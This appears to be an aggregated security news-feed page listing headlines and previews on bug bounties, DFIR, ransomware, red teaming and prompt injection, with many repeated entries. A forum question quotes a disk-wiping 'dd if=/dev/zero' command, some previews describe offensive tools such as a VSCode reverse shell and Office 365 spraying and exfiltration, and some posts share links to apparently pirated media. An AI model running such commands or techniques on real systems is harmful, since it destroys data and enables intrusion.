    A common question nowadays is “How to get started in Bug Bounties?”. So, in this article, I’ll go over a beginner’s bug bounty guide. Continue reading on Medium »
    Fuzz Open Source, Get Paid by Google
    The OSS-Fuzz project by Google increased their rewards. How you earn: integrate OSS-Fuzz into a critical open source project and find bugs… Continue reading on Medium »
    How I got $$$$ Bounty within 5 mins
    Hi folks, Usually I don't do writeups or share anything related to bug bounty. From now I will be sharing my experience and knowledge &… Continue reading on Medium »
  • Open

    Some J-songs
    I found a folder full of music including japanese songs. I was searching for J-songs and I actually found some, but when I clicked the Parent Directory link it seems that`s actualy a whole lot. this seems jackpot to me, I hope you guys can enjoy it submitted by /u/math_001 [link] [comments]
  • Open

    DD raw vs E01?
    I'm doing an assignment and have to research the different types of forensic tools and the formats that they use. I'm getting conflicting reports on this though. Is both DD and E01 raw formats? Or is DD the raw format and E01 the proprietary format? submitted by /u/Jumbofato [link] [comments]
    No-brainer Mac imaging tool?
    What would be your tool of choice if you want to get the most accurate disk image suitable for analysis on a different computer (encryption stripped)? Imagine you do not have any commercial tools at hand, so you need to justify any new purchase. It would be perfect if the tool could preserve as many low-level filesystem artifacts as possible (otherwise I could just dmg/tar/rsync it, right?). aff4 would be a plus, but not a requirement. submitted by /u/arkenoi [link] [comments]
    Results of the Survey about Career
    So the results are published in a google doc here Raw Data can be seen here If you want a csv download link lmk I am currently cleaning up the excel document to post if you want more raw data. There was 45 participants, it was a good test run. Will eventually want to make a better survey to try to reach a wider spectrum of DFIR eventually down the road. Any fixes/suggestions/help is appreciated if you want to see a 2.0 version. I know location is a key factor that will need to be addressed. *Update with the raw data / Also don't know who downvoted this but that will make it be seen by less people since it is a 0 now. So be it, put some work into this but though some people would like the results so posted it. submitted by /u/MDCDF [link] [comments]
    Custom DFIR
    Hi guys, so as a part of my project I’m building a custom DFIR for various OS’ . I’m writing a python script for all operations. For windows I was a little stuck trying to access the registry hives. So far I’ve tried using regipy and winreg but I keep running into an error stating “permission denied” I read there is a way to access hives through the system account but I’m not sure how far that would be feasible running it on a different system. Any help/insights are really appreciated. Thanks! submitted by /u/Advanced_Reaction596 [link] [comments]
  • Open

    SecWiki News 2023-02-09 Review
    软件供应链安全 2022 年回顾 by ourren 如何写好一篇高质量的IEEE/ACM Transaction级别的计算机科学论文? by ourren ChatGPT研究框架(80页PPT) by ourren ChatGPT概念“狂飙” by ourren 换种思路做入侵检测 by ourren 2022网络空间安全重大项目发展概况 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-09 Review
    软件供应链安全 2022 年回顾 by ourren 如何写好一篇高质量的IEEE/ACM Transaction级别的计算机科学论文? by ourren ChatGPT研究框架(80页PPT) by ourren ChatGPT概念“狂飙” by ourren 换种思路做入侵检测 by ourren 2022网络空间安全重大项目发展概况 by ourren 更多最新文章,请访问SecWiki
  • Open

    No password length restriction in reset password endpoint
    Nextcloud disclosed a bug submitted by aditya404: https://hackerone.com/reports/1820864
  • Open

    Azure AD Kerberos Tickets: Pivoting to the Cloud
    If you’ve ever been doing an Internal Penetration test where you’ve reached Domain Admin status and you have a cloud presence, your entire Azure cloud can still be compromised. In this blog, I’ll take you through this scenario and show you the dangers of machine account SSO compromise. We will do so without extracting any... The post Azure AD Kerberos Tickets: Pivoting to the Cloud appeared first on TrustedSec.
  • Open

    CVE-2023–0759 /Privilege Escalation in the Cockpit CMS
    This vulnerability on version 2.3.6 and 2.3.7 (fixed in 2.3.8) Continue reading on Medium »
    Offphish — Phishing revisited in 2023
    What is the state of the art with phishing in 2023? What techniques do exist, which do still work and what is know-how worth revisiting? Continue reading on SSE Blog »
    Game Of Active Directory v2 [Español]
    GOAD es un laboratorio enfocado netamente en el mundo del directorio activo y cuenta con múltiples técnicas disponibles para practicar… Continue reading on Medium »
  • Open

    FreeBuf早报 | NIST 标准化Ascon 加密算法;匿名者泄露俄运营商128GB数据
    NIST宣布,名为 Ascon 的经过身份验证的加密和散列算法系列将针对轻量级密码学应用程序进行标准化。
    最新 | 全国省委书记“一把手”谈网信工作精彩观点摘录(附名单简历)
    本文整理了31位“一把手”最新名单简历及网信工作精彩观点摘录。
    全球社交媒体三巨头大规模宕机,Twitter遭16年历史上最大中断
    全球最大的三家社交媒体平台遭遇宕机,Twitter、Instagram和YouTube的部分用户无法访问其账户。
    攻防演练事件研判篇
    分析研判技术网络安全攻击类型暴力破解xss跨站脚本攻击目录遍历恶意通信永恒之蓝勒索病毒权限提升SQL注入文件上传漏洞命令注入挖矿病毒Log4j远程代码执行网络安全攻击危害经济损失和业务损失,黑客的攻击
    SonicWall发出警告,Windows 11安全存在“局限性”
    号称史上最好的Windows系统“Win11”宣布首个正式版21H2将逐渐下线,系统用户将全面升级至22H2。
    谷歌 Bard 项目翻车,ChatGPT 或带来新的网络攻击
    ChatGPT 的成功引得微软、谷歌等科技巨头眼红,纷纷注重资企图再次入局。
    Shadowsocks 重定向攻击
    最近复现了一个比较老的洞,因为涉及到密码学相关的攻击,刚好前段时间也在学习通讯协议相关的知识,于是就比较感兴趣。
  • Open

    Fuzz Open Source, Get Paid by Google
    The OSS-Fuzz project by Google increased their rewards. How you earn: integrate OSS-Fuzz into a critical open source project and find bugs… Continue reading on Medium »
  • Open

    Fuzz Open Source, Get Paid by Google
    The OSS-Fuzz project by Google increased their rewards. How you earn: integrate OSS-Fuzz into a critical open source project and find bugs… Continue reading on Medium »
  • Open

    Join the ExploitDev - MalwareDev - Reverse Engineering Discord Server!
    submitted by /u/xenonexi [link] [comments]
  • Open

    Ask HN: Is “prompt injection” going to be a new common vulnerability?
    There was a post [0] recently about the bing chatGPT assistant either citing or hallucinating it’s own initial prompt from the (in theory) low privileged chat input UI they put together. This feels like it’s almost unavoidable if you let users actually chat with something like this. How would we sanitize strings now? I know OpenAI has banned topics they seem to regex for, but that’s always going to miss something. Are we just screwed and should make sure chat bots just run in a proverbial sandbox and can’t do anything themselves? [0] https://news.ycombinator.com/item?id=34717702 Comments URL: https://news.ycombinator.com/item?id=34719586 Points: 83 # Comments: 108
  • Open

    Analyzing an Old Netatalk dsi_writeinit Buffer Overflow Vulnerability in NETGEAR Router
    作者:cq674350529 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 2022年11月,SSD发布了一个与NETGEAR R7800型号设备相关的漏洞公告。根据该公告,该漏洞存在于Netatalk组件(对应的服务程序为afpd)中,由于在处理接收的DSI数据包时,缺乏对数据包中某些字段的适当校验,在ds...
  • Open

    Analyzing an Old Netatalk dsi_writeinit Buffer Overflow Vulnerability in NETGEAR Router
    作者:cq674350529 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 2022年11月,SSD发布了一个与NETGEAR R7800型号设备相关的漏洞公告。根据该公告,该漏洞存在于Netatalk组件(对应的服务程序为afpd)中,由于在处理接收的DSI数据包时,缺乏对数据包中某些字段的适当校验,在ds...

  • Open

    11 Expert Tips to Succeed in Bug Bounty
    My last, first article, published here after years of silent reading, received such a positive response I decided to create a more… Continue reading on Medium »
    Burrow Partners with ImmuneFi, Offering Up to $250K in Bug Bounties
    Burrow is proud to announce its new bug bounty program with ImmuneFi, aimed at identifying and fixing potential vulnerabilities in the… Continue reading on Medium »
    Some useful Bug Bounty platforms to start your journey
    HackerOne Continue reading on Medium »
    Hacking XML — XML Injection
    Introduction Continue reading on Martian Defense Cybersecurity »
    Reflected XSS on Target with tough WAF ( WAF Bypass )
    I was doing web pentesting on a private program. The program had a very tough WAF even typing alert as a payload would block be blocked by… Continue reading on Medium »
    Chaining Bugs to get my First Bug Bounty
    Openredirection + clickjacking + csrf -> Account Takeover Continue reading on InfoSec Write-ups »
    Introduction to Offensive Security-Try Hack me Day 1
    Dear readers, I’m delighted to report that I’ve begun a 100-day challenge at THM to learn more about the topic of cyber security. I’m also… Continue reading on Medium »
  • Open

    Boot camps
    I’ve been recently thinking about doing a bootcamp for cyber security. Not sure if this is the place for this but wanted to get some advice on how bootcamps are perceived in the industry. It’s back by UofM and I will have about 400 hrs of hands on experience at the end with decent certs just not sure if not having a degree will keep me from getting a job. Anyone got any insight? submitted by /u/Runnit_son [link] [comments]
    How do you conduct security assessments and audits of privileged accounts in Windows?
    What are your personal checklists, perhaps scripts? For example, whether there are admin accounts that have not been used for a long time, whether passwords have been changed in admin accounts, or whether this user really needs to be in a privileged group. P.S. I'm not talking about continuous monitoring of accounts activity. submitted by /u/athanielx [link] [comments]
    Strange TLS handshakes with my public IP in the SNI field
    Hi I'm running my personal VPN/Proxy on a cloud server and I noticed multiple failed TLS handshakes with my server's public IP in the SNI field in my Caddy logs! Is this normal or is it some kind of attack? submitted by /u/__HumbleBee__ [link] [comments]
  • Open

    What is Google Dorking, and why is it useful?
    Google Dorking is a technique used by security researchers and hackers to find vulnerable information and websites by using advanced… Continue reading on Medium »
    Apa itu OSINT? Ini penjelasannya
    Open Source Intelligence (OSINT). OSINT adalah proses pengumpulan informasi dari sumber yang tersedia secara publik untuk digunakan dalam… Continue reading on Medium »
    Exploring the dark side of Shodan
    Exploring the smoking gun of the Internet — Shodan Continue reading on Medium »
    Боты для поиска информации по номеру телефона
    Современные технологии предоставляют множество возможностей для автоматизации различных процессов, в том числе и поиска информации. Одной… Continue reading on Medium »
    OSINT Trick: Overlaying drone footage onto Google Earth
    It is possible to overlay drone footage onto Google Earth as a way to get more contemporary images of an area. Continue reading on Medium »
  • Open

    Doyensec releases tool for CVE-2022-39299 PoC
    Article URL: https://github.com/doyensec/CVE-2022-39299_PoC_Generator Comments URL: https://news.ycombinator.com/item?id=34714367 Points: 1 # Comments: 1
  • Open

    Impact of Ransomware Attacks on Businesses and Individuals
    Exploring the Devastating Effects and Importance of Implementing Preventative Measures Continue reading on InfoSec Write-ups »
    Chaining Bugs to get my First Bug Bounty
    No content preview
    Cryptography for Blockchain Security
    No content preview
    The Role of Hash Functions in Cryptography
    No content preview
  • Open

    Impact of Ransomware Attacks on Businesses and Individuals
    Exploring the Devastating Effects and Importance of Implementing Preventative Measures Continue reading on InfoSec Write-ups »
    Chaining Bugs to get my First Bug Bounty
    No content preview
    Cryptography for Blockchain Security
    No content preview
    The Role of Hash Functions in Cryptography
    No content preview
  • Open

    Impact of Ransomware Attacks on Businesses and Individuals
    Exploring the Devastating Effects and Importance of Implementing Preventative Measures Continue reading on InfoSec Write-ups »
    Chaining Bugs to get my First Bug Bounty
    No content preview
    Cryptography for Blockchain Security
    No content preview
    The Role of Hash Functions in Cryptography
    No content preview
  • Open

    How would I open a NTUSER Registry File I have from an .EO1 file?
    SOLVED : THANKS GUYS So I have an .EO1 file that contains a NTUSER registry file in there somewhere, so I opened it on FTK Imager, my question is how could I open that NTUSER registry file in a software such as 'Registry Viewer'? I know how to do it for my own User but this NTUSER is in a .EO1 file. Thank you, I am a few weeks into learning this stuff <3 submitted by /u/kreqex [link] [comments]
  • Open

    SIEM/SOAR — Red team bypass
    Cloud attacks haven’t yet become very sophisticated. In AWS, most of the external attacks are related to resource mis-configurations… Continue reading on Medium »
    Tripwire — A [red|purple|blue] team lab orchestration tool
    Tripwire is a virtual machine orchestration tool, designed to supplement Red|Purple|Blue team lab environments. It utilizes VMware… Continue reading on Medium »
    Ghostwriter v3.2 Release
    SpecterOps has released Ghostwriter v3.2 with some significant enhancements we think you’ll like. We overhauled how you interact with… Continue reading on Posts By SpecterOps Team Members »
    MITRE ATT&CK Enterprise - Framework | Tactics | Techniques (P1)
    In the series, we’re going to cover all the TTP of all the phases of the MITRE ATT&ACK Framework. Continue reading on System Weakness »
    MITRE ATT&CK Enterprise - Framework | Tactics | Techniques (P1)
    In the series, we’re going to cover all the TTP of all the phases of the MITRE ATT&ACK Framework. Continue reading on Medium »
  • Open

    ESXiArgs: The code behind the ransomware
    1 Deep Dive into an ESXi Ransomware TrustedSec’s Nick Gilberti wrote a great blog covering the ESXi ransomware’s shell script here. However, in this blog, we are going to dive a little deeper into the code behind this ransomware. The sample ransomware discussed was acquired from VirusTotal and Bleeping Computers forum. The following is a... The post ESXiArgs: The code behind the ransomware appeared first on TrustedSec.
  • Open

    OpenSSH Pre-Auth Double Free - CVE-2023-25136 - Writeup and Proof-of-Concept
    submitted by /u/n0llbyte [link] [comments]
    A Year in Review 2022: 100 vulnerabilities you should prioritize - PRIOn
    submitted by /u/gfekkas [link] [comments]
    Rustproofing Linux (Part 1, Leaking Addresses)
    submitted by /u/Gallus [link] [comments]
    Top 10 web hacking techniques of 2022
    submitted by /u/Fugitif [link] [comments]
    Fearless CORS: a design philosophy for CORS middleware libraries (and a Go implementation) :: jub0bs.com
    submitted by /u/jub0bs [link] [comments]
    Dota 2 Under Attack: How a V8 Bug Was Exploited in the Game
    submitted by /u/stashing_the_smack [link] [comments]
    Recovery script for ESXiArgs ransomware
    submitted by /u/YogiBerra88888 [link] [comments]
  • Open

    Tidbits of Cross Site Scripting — XSS
    XSS, or cross-site scripting vulnerability, is a frequent web vulnerability. Continue reading on Bug Zero »
  • Open

    SecWiki News 2023-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 印度拟在境内设立“数据大使馆”;韩国LG 数据泄露
    印度政府可能会将该政策作为即将出台的“数字数据保护法案”的一部分,该法案可能会在3月份提交。
    黑客利用向日葵漏洞部署 Sliver C2 框架
    网络攻击者正在利用向日葵中存在的安全漏洞,部署 Sliver C2 框架,以期进行后续“攻击入侵”活动。
    难以置信!两周,微软遭遇两次重大故障
    微软在不到两周的时间里遭遇了第二次重大的云服务中断。
    时隔近一个月后,LockBit正式宣告攻击了英国皇家邮政
    LockBit推翻之前未曾攻击皇家邮政的说法,于近日将勒索赎金倒计时条目添加到了数据泄露网站上。
  • Open

    i found this directory, and it's fast but i have a problem...
    the problem is, it only works if you know the full link to the file, you can't browse. does anyone know a way around this? https://bridge.rabbitsun.xyz/Series/ https://bridge.rabbitsun.xyz/Series/Truth%20Be%20Told%202019/S01/Truth.Be.Told.S01E02.480p.WEB.TagName.mkv submitted by /u/TheCrunchRadio [link] [comments]
  • Open

    Vulnerable moment-timezone version shipped
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1708873
    Suspicious login app ships old league/flysystem version
    Nextcloud disclosed a bug submitted by mik-patient: https://hackerone.com/reports/1720822

  • Open

    Why did dd zero on disk left partition intact?
    Hello all. In trying to make sure I understand how dd works, I made a small disk (sdb), partitioned, formatted, and mounted it in Kali. I loaded some random files and ran xxd -a /dev/disk to see my before state. Then I ran dd if=/dev/zero of=/dev/sdb successfully, and re-ran the xxd command to confirm it was all zeroed out. However, the files I put in the mounted folder were still there. xxd against the partition, sdb1, showed that there was still non-zero content. I wrongly assumed that zeroing the disk would also wipe out the partition. I had to run dd if=/dev/zero of=/dev/sdb1 for everything to be wiped. Can anyone help me understand why this is, or point me in the right direction so I can do my own reading? Thanks. submitted by /u/not_a_lob [link] [comments]
    Foundations of Linux Memory Forensics
    Foundational concepts to understand before venturing into Linux memory forensics Linux process data structures submitted by /u/DFIRWarlock [link] [comments]
    Job Market being a foreigner?
    A thing I’ve never seen someone talking about before, how is the job market in Forensic Analysis/Science as being a foreigner? Mostly are government related jobs and i would love to know the problems a foreigner will get through and if it’s even possible to work for other governments. Sorry if it was asked before. submitted by /u/seungles [link] [comments]
    File Recovery/ How do I use forensic software to recover game cheats
    This might be a really ridiculous post but I am so desperate, Is there any software that can recover files like exe, that doesn't take a long time to do or download? if it can't recover then that's fine as long as it showed when the file was modified, the name of the file, and the time. Please help!! Will explain more when someone respondes submitted by /u/DanteYo [link] [comments]
  • Open

    List of 41 Frequently Occurring Web Application Vulnerabilities
    These are all considerably more crucial vulnerabilities and are employed in bug bounty programmes.Just add into your list and gather much… Continue reading on Medium »
    Reveal the Cloud with Google Dorks
    Find sensitive data in Amazon AWS, Google Cloud, and more Continue reading on InfoSec Write-ups »
    Bypassing API Restrictions for Fun and Profit
    Recently, I downloaded and started testing an application locally which provided dashboard access along with rest API endpoints for it’s… Continue reading on Medium »
    “FREE 350+ Tryhackme Rooms”
    Hey Guys, I am banti samanta, a Security Researcher and a Bug Bounty Hunter. In this blog, I will be sharing a list of 350+ Free Tryhackme… Continue reading on Medium »
    Familiat Recon Tools for Pentesting and Bug Bounty
    10 Essential Tools used for Reconnaissance | Karthikeyan Nagaraj Continue reading on Medium »
    Even more resources to make you a better hacker
    Becoming a “hacker” can mean many different things to different people, so the resources you need to improve will depend on what type of… Continue reading on Medium »
    Deserialization of untrusted data — [502]
    — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — Continue reading on Medium »
    Broken Access Control -Web Application Vulnerability
    Broken Access Control is a vulnerability in which the application fails to enforce access control restrictions and security measures such… Continue reading on Medium »
    10 Essential Tips for Bug Bounty Hunters
    Bug bounty programs have become increasingly popular in recent years as a way for companies to ensure the security of their websites and… Continue reading on Medium »
  • Open

    Why is type 1 hypervisor EDR not a thing?
    The increased prevalence of threat actors targeting hypervisor platforms has only increased over the last few years and the importance of these systems has stayed roughly the same. Why have EDR vendors not began to make agents compatible with at least the major players? This thought has been going through my head for a few months but the recent development of the ESXiArgs presents another example of the need. Here is a some a good blog post that gives some context on the current campaign. https://www.trustedsec.com/blog/esxiargs-what-you-need-to-know-and-how-to-protect-your-data/ submitted by /u/PolicyArtistic8545 [link] [comments]
    IP Network Support Engineer Trying to get into cyber security
    I am an IP Network Engineer with 5 years working experience as a support engineer in a NOC environment. I am presently struggling to get a job since I completed my MSc. in Networking and Data communications and I am therefore considering adding Cyber security to my list of certifications. I did a module called "Network Information Security" as part of my MSc. program. I was wondering which cyber security certification would be an advancement for my career. I think CISSP is a long way for me. Any advice would be great. submitted by /u/clahws [link] [comments]
    200+ requests containing subdomain "thissubdomainshouldonlyresolveifwildcard.DOMAIN"
    In a DNS hunting report, I saw a spike in NXDOMAIN records for a subdomain that I have not yet seen. There were 200+ requests for FQDNs containing subdomain "thissubdomainshouldonlyresolveifwildcard". Example: thissubdomainshouldonlyresolveifwildcard.IPaddress.arpa[.]net thissubdomainshouldonlyresolveifwildcard[.]mydomain thissubdomainshouldonlyresolveifwildcard[.]myseconddomain I searched our EDR but there are no records for this domain and I am not sure what DNS server is replying NXDOMAIN (internal/external). Due to limited logging, I also cannot see which source IPs made the requests. OSINT shows this subdomain is associated with sinkholes... Is anyone familiar with this? submitted by /u/waaz_techpursuit [link] [comments]
    SOC2 report - Any benefit for a company to get a SOC2 for the company if all data is stored on AWS?
    I am consulting for a company that typically provides AWS' SOC2 report to potential clients since all their client data is stored on AWS. One prospect says that is not enough and they want one for the company itself in addition to AWS'. They also said that they want a SOC2 for the actual product they are considering purchasing from the company. Is this request overkill? Are all three SOC2 reports a reasonable request? submitted by /u/Tyggger [link] [comments]
    Is it a must to find at least one CVE in your career?
    As long as you are a security engineer. submitted by /u/IamOkei [link] [comments]
    How do I change a password on a website with a 403 Error?
    I was told that one of my passwords in chrome had been breached but when I try to go to the website to change it, I am informed that my connection is not private, and then I tried to proceed through and I was met with a 403 - Forbidden Error. How can I change this password, or delete this account to fix this? submitted by /u/gkops [link] [comments]
    Bought a used Wireless Adapter
    Hey how's it going? I've recently purchased the TL-WN722N V1 off of someone online. Bought a used one since I wanted to specifically get the V1. Anyway, what caught my eye was the very low price of €10, while it seems that this piece is going for over 50 (second-hand) in the UK/US. My question is - are there any possible ways this device could be tampered with? What are some ways I can monitor it and check it out just to make sure it's all good? Thanks! submitted by /u/Ledinukai4free [link] [comments]
  • Open

    Ask HN: Any open source options for reviewing vulnerability scanner results?
    There are a lot of good open source vulnerability scanners out there, but are there any good open source options to collect the results of multiple scanners so that you can decide what to do with them? It seems like all of the commercial options are hidden behind an enterprise pricing level. Comments URL: https://news.ycombinator.com/item?id=34699627 Points: 2 # Comments: 0
  • Open

    ESXiArgs: What you need to know and how to protect your data
    Threat Overview Around February 03, 2023, a ransomware campaign called “ESXiArgs” emerged that targeted Internet-facing VMware ESXi servers running versions older than 7.0. Though not confirmed, it has been reported by the French CERT (CERT-FR), BleepingComputer, and other sources that the campaign leverages CVE-2021-21974, which is a three-year-old vulnerability in the OpenSLP component of the... The post ESXiArgs: What you need to know and how to protect your data appeared first on TrustedSec.
    TeamFiltration V3.5.0 – Improve All the Things!
    TeamFiltration was publicly released during the DefCON30 talk, “Taking a Dump In The Cloud”. Before the public release, TeamFiltration was an internal tool for TrustedSec’s offensive security operations, which was shared internally back in January 2021. In short terms, TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring Office 365 Azure AD accounts.... The post TeamFiltration V3.5.0 – Improve All the Things! appeared first on TrustedSec.
  • Open

    CVE-2022-46663: less -R filtering bypass
    Article URL: https://www.openwall.com/lists/oss-security/2023/02/07/7 Comments URL: https://news.ycombinator.com/item?id=34698264 Points: 1 # Comments: 0
  • Open

    🔑 Introducing Matano Identity Data Lake for Open Source Cloud-Native SIEM!
    submitted by /u/shaeqahmed [link] [comments]
    Post-Exploitation: Abusing the KeePass Plugin Cache
    submitted by /u/guedou [link] [comments]
    GitHub - mazen160/secrets-patterns-db: Secrets Patterns DB: A comprehensive open-source regex database for secret detection.
    submitted by /u/mazen160 [link] [comments]
    Discovering a weakness leading to a partial bypass of the login rate limiting in the AWS Console
    submitted by /u/thorn42 [link] [comments]
    Tracing the Linux kernel using Exein Pulsar: a 5 Minute Tutorial
    submitted by /u/hdtrinh [link] [comments]
    A Detailed Analysis of a New Stealer called Stealerium
    submitted by /u/CyberMasterV [link] [comments]
    NETGEAR Nighthawk upnpd Pre-authentication Buffer Overflow
    submitted by /u/luci_morningstart [link] [comments]
    I Built a Self-Destructing USB Drive Part 3
    submitted by /u/Machinehum [link] [comments]
  • Open

    CISSP Exam Prep: Why Training with Practice Questions is the Best Approach
    Maximizing your study efforts and acing the exam: An in-depth look at the benefits of training with practice questions Continue reading on InfoSec Write-ups »
    zxcvbn Password Strength Estimator
    Implementing zxcvbn for your web app is relatively straightforward, and can provide significant benefits in terms of password security. Continue reading on InfoSec Write-ups »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application. Continue reading on InfoSec Write-ups »
    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on InfoSec Write-ups »
    Step into the World of Virtual Home Labs and Enhance Your Cybersecurity Skills
    No content preview
    Forcing for a bounty$$
    No content preview
    Wardrive without a GPS module and WiFi adapter that supports monitor mode, but a Raspberry Pi
    No content preview
    TAKING OVER MALWARE USING MACHINE LEARNING.
    No content preview
    ARE SMART CONTRACTS REALLY SMART?
    No content preview
    SSRF — Server Side Request Forgery
    No content preview
  • Open

    CISSP Exam Prep: Why Training with Practice Questions is the Best Approach
    Maximizing your study efforts and acing the exam: An in-depth look at the benefits of training with practice questions Continue reading on InfoSec Write-ups »
    zxcvbn Password Strength Estimator
    Implementing zxcvbn for your web app is relatively straightforward, and can provide significant benefits in terms of password security. Continue reading on InfoSec Write-ups »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application. Continue reading on InfoSec Write-ups »
    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on InfoSec Write-ups »
    Step into the World of Virtual Home Labs and Enhance Your Cybersecurity Skills
    No content preview
    Forcing for a bounty$$
    No content preview
    Wardrive without a GPS module and WiFi adapter that supports monitor mode, but a Raspberry Pi
    No content preview
    TAKING OVER MALWARE USING MACHINE LEARNING.
    No content preview
    ARE SMART CONTRACTS REALLY SMART?
    No content preview
    SSRF — Server Side Request Forgery
    No content preview
  • Open

    CISSP Exam Prep: Why Training with Practice Questions is the Best Approach
    Maximizing your study efforts and acing the exam: An in-depth look at the benefits of training with practice questions Continue reading on InfoSec Write-ups »
    zxcvbn Password Strength Estimator
    Implementing zxcvbn for your web app is relatively straightforward, and can provide significant benefits in terms of password security. Continue reading on InfoSec Write-ups »
    The Benefits of Implementing a Bug Bounty Program for Your Web App
    A bug bounty program is a crowdsourced approach to identifying and addressing security vulnerabilities in a web application. Continue reading on InfoSec Write-ups »
    The Right Time for a Bug Bounty and Security Team
    Starting a bug bounty program and hiring a security team are important steps for companies to take to ensure the security and… Continue reading on InfoSec Write-ups »
    Step into the World of Virtual Home Labs and Enhance Your Cybersecurity Skills
    No content preview
    Forcing for a bounty$$
    No content preview
    Wardrive without a GPS module and WiFi adapter that supports monitor mode, but a Raspberry Pi
    No content preview
    TAKING OVER MALWARE USING MACHINE LEARNING.
    No content preview
    ARE SMART CONTRACTS REALLY SMART?
    No content preview
    SSRF — Server Side Request Forgery
    No content preview
  • Open

    Dependency confusion in https://github.com/hyperledger/aries-mobile-agent-react-native
    Hyperledger disclosed a bug submitted by r3drush: https://hackerone.com/reports/1763343
  • Open

    SecWiki News 2023-02-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-07 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on Medium »
  • Open

    Will Fuzzing Replace SAST?
    In many instances, the answer is becoming “when” not “if.” Continue reading on Medium »
  • Open

    Execute Code via EnumWindows Callback
    Introduction Continue reading on Medium »
    Bringing Red Team to SOC
    Red teams and SOC teams serve different but complementary roles in ensuring the security of an organization’s IT systems and data. Red… Continue reading on Medium »
  • Open

    FreeBuf早报 | 2023年每月将新增1900个危险漏洞;本月14日 IE11将停止支持
    预计2023年平均每月将有1900个危险漏洞披露,比2022年增长13%,其中高危漏洞270个、严重高危漏洞155个。
    法国数据保护要求
    因未遵守有关使用cookie的规定,包括数据主体的同意,以及告知个人使用cookie的义务,法国国家信息委员会CNIL对谷歌处以1.5亿欧元的罚款,对Facebook处以6000万欧元的罚款。
    勒索软件关键攻击向量及缓解建议
    勒索软件能够渗透并阻碍一切组织的正常运营,这就是了解勒索软件攻击主要载体的意义所在。
    GuLoader 恶意软件升级后,瞄准了电子商务行业
    不单单是美国和韩国,勒索软件波及的范围还包括德国、沙特阿拉伯、台湾和日本。
    超5万起网络犯罪背后的连环黑客,终于在法国被逮捕
    No content preview
    加密通信应用Exclu被查,多人被逮捕
    该应用程序估计有 3000 名用户,其中包括组织犯罪集团成员。
    宁波通商银行科技人才春季专场招聘会
    简历投递邮箱:zhhr@ncbank.cn 。
    恶意文件分析系列-Xmrig家族挖矿病毒分析(第二篇)
    Xmrig家族挖矿病毒分析,通过对挖矿病毒表现出来的特征采取动态、静态相结合的方法以及差异对比分析的方法对程序的rootkit实现点进行定位分析。
  • Open

    Let’s Go (VS) Code - Red Team style
    https://badoption.eu/docs/blog/2023/01/31/code_c2.html VSCode has a protable binary, which also allows a reverse shell and some other nice features (File Explorer, Debugging, Local Port Forwarding). Authentication is via Github and hosting iscomplete on MS domains. PS: I am the author, so if there are any questions, or feedback let me know. submitted by /u/PfiatDe [link] [comments]
    Spoofing MS Office comments
    https://badoption.eu/blog/2023/02/06/spoof_office_comments.html MS Office does not verify comments, as they are stored in the file. Allows spoofing of author and or comments, even crosstenant for AAD. submitted by /u/PfiatDe [link] [comments]
    Best way to set up for assumed breach?
    I have OSCP training and web app pentesting experience but I'm new to the red team/purple team type stuff. How do you folks normally set up for assumed breach scenarios? Say you have a client that wants to do an assumed breach purple team assessment of their on-prem domain and you have a cobalt strike server set up. How do you ask them to set up for you? Do you... ask them to set up a machine on the domain and give you creds to it? ask them to turn off whatever protections so you can put a beacon on the machine? just ask for information to vpn to the network? etc. What exactly is the normal way you would do this? submitted by /u/Jumpy_Hamster [link] [comments]
  • Open

    Seems Like A Jackpot To Me
    https://drive.google.com/drive/folders/1S-zjW17dRGK3XEi8l1T5bEUHJqMxto5X contains movies, software and tons of learning content. Everything I saw in it was organised. submitted by /u/False-Celebration930 [link] [comments]
    Is the a way to preview open directories like in google drive?
    the way files can be previewed in google drive , is it possible to do same with any open directory with any extension or something else? submitted by /u/False-Celebration930 [link] [comments]
    Female Dragons (illustrations)
    https://drive.google.com/drive/folders/12IaTHgSgBrr8-NWm6eEaaHhJTiLCNJat submitted by /u/False-Celebration930 [link] [comments]
  • Open

    TryHackMe :: OhSINT Write-up
    Hoje, iremos utilizar algumas técnicas relacionadas a OSINT para descobrir as flags do room OhSINT, do THM. OSINT [Open Source… Continue reading on Medium »
    OhSINT room tryhackme
    So yeah, this is actually my first ever article to write in my Medium, hope I can do more. The sole reason for me doing this is to record… Continue reading on Medium »
  • Open

    Why Lists?
    So much of what we see in cybersecurity, in SOC, DFIR, red teaming/ethical hacking/pen testing, seems to be predicated on lists. Lists of tools, lists of books, lists of sites with courses, lists of free courses, etc. CD-based distros are the same way, regardless of whether they're meant for red- or blue-team efforts; the driving factor behind them is often the list of tools embedded within the distribution. For example, the Kali Linux site says that it has "All the tools you need". If you go to the SANS SIFT Workstation site, you'll see the description that includes, "...a collection of free and open-source incident response and forensic tools." Here's a Github site that lists "blue team tools"...but that's it, just a list. Okay, so what's up with lists, you ask? What's the "so, what?"  …
  • Open

    Fuzzing ATM/POS protocols like a Boss
